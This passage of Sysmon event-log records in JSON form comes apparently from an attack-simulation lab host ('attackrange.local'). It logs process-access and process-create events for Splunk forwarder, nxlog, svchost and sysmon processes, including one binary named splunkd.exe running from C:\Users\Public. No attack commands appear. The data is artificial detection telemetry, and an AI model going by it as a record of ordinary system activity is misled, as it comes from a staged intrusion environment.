C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:25.458","SourceProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010ED600300}","SourceProcessId":"3816","SourceThreadId":"3836","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1075-5F25-0000-001039210400}","TargetProcessId":"3776","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-perfmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:25","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2327,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:25.770\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:25.770","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:49:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:26","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2328,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:26.136\r\nProcessGuid: {E2A3D6B1-1076-5F25-0000-0010DD220400}\r\nProcessId: 3476\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nFileVersion: ?\r\nDescription: ?\r\nProduct: ?\r\nCompany: ?\r\nOriginalFileName: ?\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C\r\nParentProcessGuid: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nParentProcessId: 2792\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:49:26.136","ProcessGuid":"{E2A3D6B1-1076-5F25-0000-0010DD220400}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","FileVersion":"?","Description":"?","Product":"?","Company":"?","OriginalFileName":"?","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C","ParentProcessGuid":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","ParentProcessId":"2792","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:49:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:26","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2329,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:26.317\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nSourceProcessId: 2792\r\nSourceThreadId: 4028\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-1076-5F25-0000-0010DD220400}\r\nTargetProcessId: 3476\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:26.317","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","SourceProcessId":"2792","SourceThreadId":"4028","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-1076-5F25-0000-0010DD220400}","TargetProcessId":"3476","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:26","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2330,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:26.317\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1076-5F25-0000-0010DD220400}\r\nTargetProcessId: 3476\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:26.317","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1076-5F25-0000-0010DD220400}","TargetProcessId":"3476","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:49:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:26","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2331,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:26.317\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:26.317","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:26","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2332,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:26.317\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:26.317","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:26","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2333,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:26.317\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:26.317","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:26","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2334,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:26.317\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:26.317","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+